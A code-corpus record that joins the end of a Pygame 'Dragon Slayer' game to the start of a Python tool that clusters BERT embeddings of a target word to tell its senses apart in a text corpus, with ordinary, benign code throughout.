if player.get_location() == 'dragonone' or player.get_location() == 'dragonentrance' or player.get_location() == 'dragoncave':
newfour_cloud.update()
newfive_cloud.update()
#Final operations in while loop
pg.display.update()
clock.tick(FPS)
#Get out of controls screen
def get_out():
global controls
controls = False
game_start()
#Controls Screen
def game_controls():
controls = True
while controls:
for event in pg.event.get():
if event.type == pg.QUIT:
quitgame()
GAMEDISPLAY.fill(black)
TextSurf, TextRect = text_objects('Game Controls', largeText, gray)
TextRect.center = ((display_width / 2), (display_height / 5))
GAMEDISPLAY.blit(TextSurf, TextRect)
TextSurf, TextRect = text_objects('Use arrow keys to move!', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 75))
GAMEDISPLAY.blit(TextSurf, TextRect)
TextSurf, TextRect = text_objects('Click mouse to engage with villagers!', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 150))
GAMEDISPLAY.blit(TextSurf, TextRect)
TextSurf, TextRect = text_objects('Hit escape to view progress, pause or for a tip!', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 225))
GAMEDISPLAY.blit(TextSurf, TextRect)
button('Back', 500, 230, 100, 50, blue, hoverblue, get_out)
pg.display.update()
#Start Screen
def game_start():
start = True
while start:
for event in pg.event.get():
if event.type == pg.QUIT:
quitgame()
GAMEDISPLAY.blit(bgstart, (0, 0))
TextSurf, TextRect = text_objects('Dragon Slayer', largeText, black)
TextRect.center = ((display_width / 2), (display_height / 5))
GAMEDISPLAY.blit(TextSurf, TextRect)
button('Play!', 180, 230, 150, 50, blue, hoverblue, game_intro)
button(' Quit!', 840, 230, 150, 50, blue, hoverblue, quitgame)
button('Controls!', 500, 230, 160, 50, blue, hoverblue, game_controls)
pg.display.update()
#Victory Screen
def victory():
victory = True
while victory:
for event in pg.event.get():
if event.type == pg.QUIT:
quitgame()
GAMEDISPLAY.fill(black)
GAMEDISPLAY.blit(trophy, ((display_width / 2) - 109.5, display_height / 2))
TextSurf, TextRect = text_objects('VICTORY', largeText, gray)
TextRect.center = ((display_width / 2), (display_height / 5))
GAMEDISPLAY.blit(TextSurf, TextRect)
button(' Quit!', (display_width / 2) - 50, (display_height / 2) - 60, 100, 50, blue, hoverblue, quitgame)
pg.display.update()
#Unpause function
def unpause():
pauseoutsound.play()
global pause
pause = False
#Pause Screen
def game_pause(playerlvl, wandlvl, healthlvl, bootlvl):
pauseinsound.play()
while pause:
for event in pg.event.get():
if event.type == pg.QUIT:
quitgame()
GAMEDISPLAY.fill(black)
TextSurf, TextRect = text_objects('Game Paused', largeText, gray)
TextRect.center = ((display_width / 2), (display_height / 5))
GAMEDISPLAY.blit(TextSurf, TextRect)
TextSurf, TextRect = text_objects('Player Quest Level: ' + str(playerlvl) + '/12', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 75))
GAMEDISPLAY.blit(TextSurf, TextRect)
TextSurf, TextRect = text_objects('Player Wand Level: ' + str(wandlvl) + '/1', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 150))
GAMEDISPLAY.blit(TextSurf, TextRect)
TextSurf, TextRect = text_objects('Player Health Level: ' + str(healthlvl) + '/1', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 225))
GAMEDISPLAY.blit(TextSurf, TextRect)
TextSurf, TextRect = text_objects('Player Boots Level: ' + str(bootlvl) + '/1', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 300))
GAMEDISPLAY.blit(TextSurf, TextRect)
if playerlvl <= 7:
TextSurf, TextRect = text_objects('Tip: What is in that corner', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 375))
GAMEDISPLAY.blit(TextSurf, TextRect)
elif wandlvl != 1 or healthlvl != 1:
TextSurf, TextRect = text_objects('Tip: Villagers may assist you in your quest', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 375))
GAMEDISPLAY.blit(TextSurf, TextRect)
elif wandlvl == 1 and healthlvl == 1:
TextSurf, TextRect = text_objects('Tip: The dragon went west', smallText, gray)
TextRect.center = ((display_width / 2), ((display_height / 3.5) + 375))
GAMEDISPLAY.blit(TextSurf, TextRect)
button('Resume', 180, 230, 100, 50, blue, hoverblue, unpause)
button(' Quit', 840, 230, 100, 50, blue, hoverblue, quitgame)
pg.display.update()
#Death Screen
def death():
death = True
while death:
for event in pg.event.get():
if event.type == pg.QUIT:
quitgame()
GAMEDISPLAY.fill(black)
GAMEDISPLAY.blit(deathimg, ((display_width / 2) - 100, display_height / 2))
TextSurf, TextRect = text_objects('You Died', largeText, gray)
TextRect.center = ((display_width / 2), (display_height / 5))
GAMEDISPLAY.blit(TextSurf, TextRect)
button(' Quit!', (display_width / 2) - 65, (display_height / 2) - 80, 100, 50, blue, hoverblue, quitgame)
pg.display.update()
#Game introduction
def game_intro():
pg.mixer.music.stop()
intro = True
while intro:
for event in pg.event.get():
if event.type == pg.QUIT:
quitgame()
display_image(dragonclosed, 0, 0, 1.5)
display_image(dragonhalf, 0, 0, 0.05)
display_image(dragonopen, 0, 0, 1.2)
GAMEDISPLAY.fill(black)
display_image(doorone, 430, 546, 1.2)
introdoor.set_volume(0.04)
introdoor.play()
display_image(doortwo, 430, 546, 0.7)
introdoor.set_volume(0.08)
introdoor.play()
display_image(doorthree, 430, 546, 0.7)
introdoor.set_volume(0.12)
introdoor.play()
display_image(doorfour, 430, 546, 0.5)
GAMEDISPLAY.fill(black)
time.sleep(1.8)
game_loop(650, 260, 900, 410, GameSceneOne())
intro = False
#Icon image
pg.display.set_icon(holdwand)
#Initiation
pg.mixer.music.load(songs[5])
pg.mixer.music.play(-1)
game_start()
| [
"lczernel@gmail.com"
] | lczernel@gmail.com |
15f341014c83987b874301eb336a62b9c02e9dad | 42afabf5de1a01a883824be45ddc456203b3241a | /intradomain_toolkit/intradomain_toolkit/disambiguation.py | 4f62d4a21fe28ce1b8ef51c5c5093903a672e3f2 | [
"MIT"
] | permissive | ambarish-moharil/intradomain | e4e33bf39778976f13a48fdc416ef18022219614 | bdfbe15552cd1a991a92f01752d3b9f6e409bd5b | refs/heads/main | 2023-06-26T13:47:10.178714 | 2021-07-24T11:21:55 | 2021-07-24T11:21:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87,894 | py | import pandas as pd
import re
import requests
import os
import nltk
import string
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk import word_tokenize, sent_tokenize
import torch
from transformers import BertTokenizer, BertModel
from transformers import BertTokenizer, BertModel
import logging
import matplotlib.pyplot as plt
import shutil
from sklearn.cluster import KMeans
import seaborn as sns
from scipy.spatial.distance import cosine
import pickle
from sklearn_extra.cluster import KMedoids
import os
def disambiguate():
model = BertModel.from_pretrained('bert-base-uncased',
output_hidden_states = True, # Whether the model returns all hidden-states.
)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
# Cleaning the text
def standardize_text(text_field):
text_field = text_field.replace(r"http\S+", " ")
text_field = text_field.replace(r"http", " ")
text_field = text_field.replace(r"(\d)", " ")
text_field = text_field.replace(r"@\S+", " ")
text_field = text_field.replace(r"[^A-Za-z0-9(),!?@\'\`\"\_\n,\\,/,.,:,;,'""']", " ")
text_field = text_field.replace(r"\\", " ")
text_field = text_field.replace(r".", " ")
text_field = text_field.replace(r";", " ")
text_field = text_field.replace(r",", " ")
text_field = text_field.replace(r":", " ")
text_field = text_field.replace(r"←", " ")
text_field = text_field.replace(r"≠", " ")
text_field = text_field.replace(r"'", " ")
text_field = text_field.replace(r"(", " ")
text_field = text_field.replace(r")", " ")
text_field = text_field.replace(r"[", " ")
text_field = text_field.replace(r"]", " ")
text_field = text_field.replace(r"[]", " ")
text_field = text_field.replace(r"?", " ")
text_field = text_field.replace(r"()", " ")
text_field = text_field.replace(r'"', " ")
text_field = text_field.replace(r"-", " ")
text_field = text_field.replace(r"{", " ")
text_field = text_field.replace(r"}", " ")
text_field = text_field.replace(r"*", " ")
text_field = text_field.replace(r"~,!", " ")
text_field = text_field.replace(r"@", " ")
text_field = re.sub("[?]", " ", text_field)
text_field = text_field.replace(r"#", " ")
text_field = text_field.replace(r"$", " ")
text_field = text_field.replace(r"%", " ")
text_field = text_field.replace(r"^", " ")
text_field = text_field.replace(r"&", " ")
text_field = text_field.replace(r"=", " ")
text_field = text_field.replace(r"+", " ")
text_field = text_field.replace(r"`", " ")
text_field = text_field.replace(r"<", " ")
text_field = text_field.replace(r">", " ")
text_field = text_field.replace(r"·", " ")
text_field = re.sub("[”“]", " ", text_field)
text_field = text_field.replace(r"//", " ")
text_field = text_field.replace(r"|", " ")
text_field = text_field.replace(r"|", " ")
text_field = text_field.replace(r"&[A-Z][a-z][0-9]", " ")
text_field = text_field.replace(r"[0-9]+", " ")
text_field = text_field.replace(r"[a-z]+", " ")
text_field = text_field.replace(r"[a-zA-z]", " ")
text_field = text_field.replace(r"\[0-9a-zA-Z]", " ")
text_field = re.sub("[–]", " ", text_field)
text_field = text_field.replace(r"λ", " ")
text_field = text_field.replace(r"@", "at")
text_field = text_field.lower()
text_field = re.sub("\s[0-9]+", " ", text_field)
text_field = re.sub("\b[a-z]\b", " ", text_field)
text_field = re.sub("—", " ", text_field)
text_field = re.sub("_", " ", text_field)
text_field = re.sub("™"," ", text_field)
text_field = re.sub("/", " ", text_field)
text_field = re.sub("[0-9]", " ", text_field)
text_field = text_field.replace("nin library and unix conventions the null character is used to terminate text strings such nullterminated strings can be known in abbreviation as asciz or asciiz where here stands for zero\\nbinary oct dec hex abbreviation name\\n\\n null nul ␀ null\\n som soh ␁ start of heading\\n eoa stx ␂ start of text\\n eom etx ␃ end of text\\n eot ␄ end of transmission\\n wru enq ␅ enquiry\\n ru ack ␆ acknowledgement\\n bell bel ␇ bell\\n fe bs ␈ backspaceef\\n ht sk ht ␉ horizontal tabg\\na lf ␊ line feed\\nb vtab vt ␋ vertical tab\\nc ff ␌ form feed\\nd cr ␍ carriage returnh\\ne so ␎ shift out\\nf si ␏ shift in\\n dc dle ␐ data link escape\\n dc ␑ device control often xon\\n dc ␒ device control\\n dc ␓ device control often xoff\\n dc ␔ device control\\n err nak ␕ negative acknowledgement\\n sync syn ␖ synchronous idle\\n lem etb ␗ end of transmission block\\n can ␘ cancel\\n em ␙ end of medium\\na ss sub ␚ substitute\\nb esc ␛ ei escapej\\nc fs ␜ file separator\\nd gs ␝ group separator\\ne rs ␞ record separator\\nf us ␟ unit separator\\nf del ␡", " ")
text_field = re.sub("[½¼¢~]", " ", text_field)
text_field = text_field.replace('\\n', " ")
text_field = text_field.replace("("," ")
text_field = text_field.replace(")"," ")
text_field = text_field.replace("#"," ")
text_field = text_field.replace("&"," ")
text_field = text_field.replace("\\"," ")
text_field = ' '.join(i for i in text_field.split() if not (i.isalpha() and len(i)==1))
return text_field
def get_sent(text, tarr):
with open(text, 'r') as f:
global inp_str
inp_str = target_list[tarr]
text = f.read()
text = text.replace('\\n', "")
text = text.replace("(","")
text = text.replace(")","")
sentences = sent_tokenize(text)
#for ref in range(len(top_102_words)):
#locals()["word_sentences" + str(ref)] = [" ".join([sentences[i-1], j, sentences[i+1]]) for i,j in enumerate(sentences) if str(top_102_words[ref]) in word_tokenize(j)]
global sent_word
sent_word = [" ".join([sentences[i-1], j, sentences[i+1]]) for i,j in enumerate(sentences) if inp_str in word_tokenize(j)]
#print(ref)
def filter_sent(list_input):
global filt_sent_
filt_sent_= []
for cln in list_input:
cleaned = standardize_text(cln)
filt_sent_.append(cleaned)
#return filt_sent_
target_list = []
## Listing all the inputs here
number_of_target_words = int(input("Enter the number of target terms that you wish to disambiguate\n"))\
for tar_index in range(number_of_target_words):
tar_name = input("Enter the target term\n")
target_list.append(tar_name)
len(target_list)
lower_label_int = int(input("Enter input for a starting label for which the threshold plot is to be obtained\n"))
upper_label_int = int(input("Enter input for a ending label for which the threshold plot is to be obtained\n"))
cluster_num_plot = int(input("Enter the cluster number for which the threshold plot is to be obtained\n"))
thresh = float(input("Enter the threshold for the context words to be obtained\n"))
directory_input = "elbow"
clustering_type = "kmeans"
text_corpus_path = str(input("Enter your path for the text corpus\n"))
dir_path = str(input("Enter the path where you wish to save all the plots\n"))
for tarr in range(len(target_list)):
try:
get_sent(text_corpus_path, tarr)
print(len(sent_word))
## Taking 852 sentences due to computational limitation
wrt = str(inp_str + 's')
if len(sent_word) < 3000:
print("Length Less than 3000")
vector_bucket = []
inter_sent = []
sent_word_ = []
word_bucket = []
#di = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + clustering_type + "/" + directory_input)
#directory = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + clustering_type + "/" + directory_input + "/"+ inp_str + "_" + str(1))
dir = dir_path + clustering_type + "/" + directory_input + "/"+ inp_str + "_" + str(1)
if os.path.exists(dir):
shutil.rmtree(dir)
os.makedirs(dir)
for gh in range(len(sent_word)):
sent_word_.append(sent_word[gh])
filter_sent(sent_word_)
print(len(filt_sent_))
print(len(sent_word_))
## Collecting the same word in different contexts
vector_mat_list = []
label_list = []
for sent_par in range(len(sent_word_)):
try:
marked_text_test = "[CLS]" + " " + filt_sent_[sent_par] + " " + "[SEP]"
tokenized_text_test = tokenizer.tokenize(marked_text_test)
indexed_tokens_test = tokenizer.convert_tokens_to_ids(tokenized_text_test)
segment_ids_test = [1]*len(tokenized_text_test)
tokens_tensors_test = torch.tensor([indexed_tokens_test])
segments_tensors_test = torch.tensor([segment_ids_test])
with torch.no_grad():
output_test = model(tokens_tensors_test, segments_tensors_test)
hidden_states_test = output_test[2]
token_embeddings_test = torch.stack(hidden_states_test, dim=0)
token_embeddings_test = torch.squeeze(token_embeddings_test, dim=1)
token_embeddings_test = token_embeddings_test.permute(1,0,2)
print(token_embeddings_test.size())
token_vecs_sum_test = []
for token_test in token_embeddings_test:
sum_vec_test = torch.sum(token_test[-4:], dim=0)
token_vecs_sum_test.append(sum_vec_test)
token_vecs_test = hidden_states_test[-2][0]
sentence_embedding_test = torch.mean(token_vecs_test, dim=0)
print ("Our final sentence embedding vector of shape:", sentence_embedding_test.size())
i_test_list = []
for i_test, token_str_test in enumerate(tokenized_text_test):
if token_str_test == inp_str:
print(i_test, token_str_test)
i_test_list.append(i_test)
vector_mat_list.append(token_vecs_sum_test[i_test_list[0]])
label_str = inp_str + " " + str(sent_par)
label_list.append(label_str)
print("vector values for each instance of" + " " + inp_str)
print('\n')
print(inp_str, str(token_vecs_sum_test[i_test_list[0]][:1]))
print("\n" + str(sent_par))
inter_sent.append(sent_word_[sent_par])
for tok in range(len(tokenized_text_test)):
if tokenized_text_test[tok] != inp_str and tokenized_text_test[tok] != wrt:
vector_bucket.append(token_vecs_sum_test[tok])
word_bucket.append(tokenized_text_test[tok])
except (IndexError, RuntimeError) as e:
# del locals()["sent_word_" + str(len(sent_word))][sent_par]
residual_list = []
final_sent_list = []
residual_list.append(sent_word_[sent_par])
# for sentr in locals()["sent_word_" + str(len(sent_word))]:
# if sentr not in residual_list:
# final_list.append(sentr)
#rint(len(final_list))
continue
elif len(sent_word) > 3000:
print("Length Greater than 3000")
vector_bucket = []
word_bucket = []
inter_sent = []
sent_word_ = []
#di = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + clustering_type + "/" + directory_input)
#directory = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + clustering_type + "/" + directory_input + "/"+ inp_str + "_" + str(1))
#directory = os.mkdir("/home/amboo/Desktop/BERT/context_results/" + inp_str + "_" + str(1))
dir = dir_path + clustering_type + "/" + directory_input + "/"+ inp_str + "_" + str(1)
if os.path.exists(dir):
shutil.rmtree(dir)
os.makedirs(dir)
for gj in range(3000):
sent_word_.append(sent_word[gj])
filter_sent(sent_word_)
print(len(filt_sent_))
print(len(sent_word_))
## Collecting the same word in different contexts
vector_mat_list = []
label_list = []
for sent_par in range(len(sent_word_)):
try:
marked_text_test = "[CLS]" + " " + filt_sent_[sent_par] + " " + "[SEP]"
tokenized_text_test = tokenizer.tokenize(marked_text_test)
indexed_tokens_test = tokenizer.convert_tokens_to_ids(tokenized_text_test)
segment_ids_test = [1]*len(tokenized_text_test)
tokens_tensors_test = torch.tensor([indexed_tokens_test])
segments_tensors_test = torch.tensor([segment_ids_test])
with torch.no_grad():
output_test = model(tokens_tensors_test, segments_tensors_test)
hidden_states_test = output_test[2]
token_embeddings_test = torch.stack(hidden_states_test, dim=0)
token_embeddings_test = torch.squeeze(token_embeddings_test, dim=1)
token_embeddings_test = token_embeddings_test.permute(1,0,2)
print(token_embeddings_test.size())
token_vecs_sum_test = []
for token_test in token_embeddings_test:
sum_vec_test = torch.sum(token_test[-4:], dim=0)
token_vecs_sum_test.append(sum_vec_test)
token_vecs_test = hidden_states_test[-2][0]
sentence_embedding_test = torch.mean(token_vecs_test, dim=0)
print ("Our final sentence embedding vector of shape:", sentence_embedding_test.size())
i_test_list = []
for i_test, token_str_test in enumerate(tokenized_text_test):
if token_str_test == inp_str:
print(i_test, token_str_test)
i_test_list.append(i_test)
vector_mat_list.append(token_vecs_sum_test[i_test_list[0]])
label_str = inp_str + " " + str(sent_par)
label_list.append(label_str)
print("vector values for each instance of" + " " + inp_str)
print('\n')
print(inp_str, str(token_vecs_sum_test[i_test_list[0]][:1]))
print("\n" + str(sent_par))
inter_sent.append(sent_word_[sent_par])
for tok in range(len(tokenized_text_test)):
if tokenized_text_test[tok] != inp_str and tokenized_text_test[tok] != wrt:
vector_bucket.append(token_vecs_sum_test[tok])
word_bucket.append(tokenized_text_test[tok])
except (IndexError, RuntimeError) as e:
residual_list = []
final_list = []
residual_list.append(sent_word_[sent_par])
continue
## Creating the nxn matrix
## 3 lists have been created for the input string
#sent_word ---- containing the sentence in which the word has been used
# vector_mat_list ---- containing the embedded vector wrt to the sentence
#label_list ----- labelled input string
## NxN Matrix Creation
print(len(vector_mat_list))
import numpy as np
input_shape = len(vector_mat_list)
target_matrix = np.zeros(shape=(input_shape,input_shape))
matrix_list = []
for i_ in range(input_shape):
for j_ in range(input_shape):
target_matrix[i_][j_] = 1 - cosine(vector_mat_list[i_], vector_mat_list[j_])
matrix_list.append([i_,target_matrix[i_][j_]])
print(str(i_), str(j_))
mat_dir = dir_path + "/matrices/"
if os.path.exists(mat_dir):
shutil.rmtree(mat_dir)
os.makedirs(mat_dir)
with open(mat_dir + inp_str + "_matrix.dat", "wb") as tm:
pickle.dump(target_matrix, tm)
target_matrix
## Kmeans Elbow Method
from sklearn.cluster import KMeans
from scipy.spatial.distance import cdist
X = target_matrix
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
X_ = pca.fit_transform(X)
K = range (1,11)
wcss = []
distortions = []
for i in K:
kmeans = KMeans(n_clusters = i, init = "k-means++", max_iter = 300, n_init = 10, random_state=0)
kmeans.fit(X)
wcss.append(kmeans.inertia_)
distortions.append(sum(np.min(cdist(X, kmeans.cluster_centers_, 'euclidean'), axis=1)) / X.shape[0])
from kneed import KneeLocator
kn = KneeLocator(list(K), distortions, S=1.0, curve='convex', direction='decreasing')
import matplotlib.pyplot as plt
figure = plt.plot(range(1,11), wcss)
plt.title(" The Elbow Method")
plt.xlabel("Number of Clusters")
plt.ylabel("WCSS")
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "elbow.png")
plt.clf()
print(wcss)
per_dec_list = []
k_op = 1
K_clust = 1
K_clustr = 1
for wc in range(0,len(wcss)-1):
perc_dec = (1 - (wcss[wc +1]/wcss[wc]))*100
print(perc_dec)
per_dec_list.append(perc_dec)
print('\n')
for per in range(len(per_dec_list)):
if per_dec_list[per] > 23:
k_op = wcss.index(wcss[per + 1])
K_clust = k_op + 1
else:
K_clustr = 1
print(K_clust)
if K_clustr == K_clust:
optimal_k = 1
else:
optimal_k = K_clust
print(optimal_k)
from yellowbrick.cluster import KElbowVisualizer
X = target_matrix
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
X_ = pca.fit_transform(X)
kmeans = KMeans(n_clusters = i, init = "k-means++", max_iter = 300, n_init = 10, random_state=0)
visualizer = KElbowVisualizer(kmeans, k=(1,10))
visualizer.fit(X_)
# Fit the data to the visualizer
plt.xlabel("k clusters")
plt.ylabel("distotion score")
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "elbow1.png")
#visualizer.show()
plt.clf()
## Intercluster Distance
from yellowbrick.cluster import InterclusterDistance
from sklearn.manifold import MDS
mod = KMeans(optimal_k)
visuals = InterclusterDistance(mod, embedding = 'tsne')
visuals.fit(X_) # Fit the data to the visualizer
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "ICD.png")
plt.clf()
## Gap Statistics
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import make_blobs
from sklearn.metrics import pairwise_distances
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
#PCA Transformation
from sklearn.decomposition import PCA
pca = PCA(n_components=3)
X_ = pca.fit_transform(X)
def compute_inertia(a, X):
W = [np.mean(pairwise_distances(X[a == c, :])) for c in np.unique(a)]
return np.mean(W)
def compute_gap(clustering, data, k_max=5, n_references=5):
if len(data.shape) == 1:
data = data.reshape(-1, 1)
reference = np.random.rand(*data.shape)
reference_inertia = []
for k in range(1, k_max+1):
local_inertia = []
for _ in range(n_references):
clustering.n_clusters = k
assignments = clustering.fit_predict(reference)
local_inertia.append(compute_inertia(assignments, reference))
reference_inertia.append(np.mean(local_inertia))
ondata_inertia = []
for k in range(1, k_max+1):
clustering.n_clusters = k
assignments = clustering.fit_predict(data)
ondata_inertia.append(compute_inertia(assignments, data))
gap = np.log(reference_inertia)-np.log(ondata_inertia)
return gap, np.log(reference_inertia), np.log(ondata_inertia)
k_max = 5
gap, reference_inertia, ondata_inertia = compute_gap(KMeans(), X_, k_max)
plt.plot(range(1, k_max+1), reference_inertia,
'-o', label='reference')
plt.plot(range(1, k_max+1), ondata_inertia,
'-o', label='data')
plt.xlabel('k')
plt.ylabel('log(inertia)')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "gap_inertia.png")
plt.clf()
plt.plot(range(1, k_max+1), gap, '-o')
plt.ylabel('gap')
plt.xlabel('k')
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "gap.png")
plt.clf()
for n in range(len(gap)):
if gap[n] == gap.max():
k_cluster_no = n +1
word_contexts = k_cluster_no
print("The predicted number of optimum clusters are {}".format(k_cluster_no))
print("The predicted number of contexts for the word {} are {}".format(inp_str, k_cluster_no))
## Silhouette Method Kmeans
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from sklearn.cluster import KMeans
from sklearn import metrics
from sklearn.metrics import silhouette_score
sil = []
kmax = 5
# dissimilarity would not be defined for a single cluster, thus, minimum number of clusters should be 2
for k in range(2, kmax+1):
kmeans = KMeans(n_clusters = k).fit(X_)
labels = kmeans.labels_
sil.append(silhouette_score(X_, labels, metric = 'euclidean'))
sil
figure = plt.plot(range(2,kmax+1), sil)
plt.title(" The Silhouette Method")
plt.xlabel("Number of Clusters")
plt.ylabel("Sill")
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "sil.png")
plt.clf()
sil = np.array(sil)
for g in range(len(sil)):
if sil[g] == sil.max():
if sil.max() <= 0.53:
k_sil = 1
print("The predicted number of optimum clusters are {}".format(k_sil))
print("The predicted number of contexts for the word {} are {}".format(inp_str, k_sil))
else:
k_sil = g +2
print("The predicted number of optimum clusters are {}".format(k_sil))
print("The predicted number of contexts for the word {} are {}".format(inp_str, k_sil))
from yellowbrick.cluster import SilhouetteVisualizer
visualizer_sil = SilhouetteVisualizer(kmeans, colors='yellowbrick')
visualizer_sil.fit(X_) # Fit the data to the visualizer
plt.savefig(dir_path + clustering_type + "/" + directory_input + "/" + inp_str + "_" + str(1) + "/" + inp_str + "_" + str(1) + "_" +"cluster" + "_" + "sil_color.png")
plt.clf()
## Cluster Analysis
n_clusters = k_sil
word_of_cluster_0 = []
word_of_cluster_1 = []
sent_of_cluster_0 = []
sent_of_cluster_1 = []
word_of_cluster_2 = []
word_of_cluster_3 = []
sent_of_cluster_2 = []
sent_of_cluster_3 = []
word_of_cluster_4 = []
word_of_cluster_5 = []
sent_of_cluster_4 = []
sent_of_cluster_5 = []
if n_clusters == 1:
kmeans = KMeans(n_clusters = n_clusters , init ="k-means++", max_iter= 300 , n_init= 10, random_state = 0 , precompute_distances = True)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
for km in range(len(y_kmeans)):
if y_kmeans[km] == 0:
word_of_cluster_0.append(label_list[km])
sent_of_cluster_0.append(inter_sent[km])
##Plotting
"""User can plot the clusters if they wish"""
#plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
#plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
#plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
#plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
#plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
#plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 150, c = 'black', label = 'Centroids')
#plt.title('Clusters of the word {}' .format(inp_str))
#plt.xlabel('{} Labels Along X-axis' .format(inp_str))
#plt.ylabel('{} Labels Along Y-axis' .format(inp_str))
#plt.legend()
#plt.savefig("/home/amboo/Desktop/BERT/kmeans/{}.png" . format(inp_str))
#plt.clf()
if n_clusters == 2:
kmeans = KMeans(n_clusters = 2 , init ="k-means++", max_iter= 300 , n_init= 10, random_state = 0 , precompute_distances = False)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
for km in range(len(y_kmeans)):
if y_kmeans[km] == 0:
word_of_cluster_0.append(label_list[km])
sent_of_cluster_0.append(inter_sent[km])
if y_kmeans[km] == 1:
word_of_cluster_1.append(label_list[km])
sent_of_cluster_1.append(inter_sent[km])
##Plotiing
"""User can plot the clusters if they wish"""
#plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
#plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
#plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
#plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
#plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
#plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 150, c = 'black', label = 'Centroids')
#plt.title('Clusters of the word {}' .format(inp_str))
#plt.xlabel('{} Labels Along X-axis' .format(inp_str))
#plt.ylabel('{} Labels Along Y-axis' .format(inp_str))
#plt.legend()
#plt.savefig("/home/amboo/Desktop/BERT/kmeans/{}.png" . format(inp_str))
#plt.clf()
if n_clusters == 3:
kmeans = KMeans(n_clusters = n_clusters , init ="k-means++", max_iter= 300 , n_init= 10, random_state = 0 , precompute_distances = True)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
for km in range(len(y_kmeans)):
if y_kmeans[km] == 0:
word_of_cluster_0.append(label_list[km])
sent_of_cluster_0.append(inter_sent[km])
if y_kmeans[km] == 1:
word_of_cluster_1.append(label_list[km])
sent_of_cluster_1.append(inter_sent[km])
if y_kmeans[km] == 2:
word_of_cluster_2.append(label_list[km])
sent_of_cluster_2.append(inter_sent[km])
#Plotting
"""User can plot the clusters if they wish"""
#plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
#plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
#plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
#plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
#plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
#plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 150, c = 'black', label = 'Centroids')
#plt.title('Clusters of the word {}' .format(inp_str))
#plt.xlabel('{} Labels Along X-axis' .format(inp_str))
#plt.ylabel('{} Labels Along Y-axis' .format(inp_str))
#plt.legend()
#plt.savefig("/home/amboo/Desktop/BERT/kmeans/{}.png" . format(inp_str))
#plt.clf()
if n_clusters == 4:
kmeans = KMeans(n_clusters = n_clusters , init ="k-means++", max_iter= 300 , n_init= 10, random_state = 0 , precompute_distances = False)
kmeans.fit(X)
y_kmeans = kmeans.predict(X)
for km in range(len(y_kmeans)):
if y_kmeans[km] == 0:
word_of_cluster_0.append(label_list[km])
sent_of_cluster_0.append(inter_sent[km])
if y_kmeans[km] == 1:
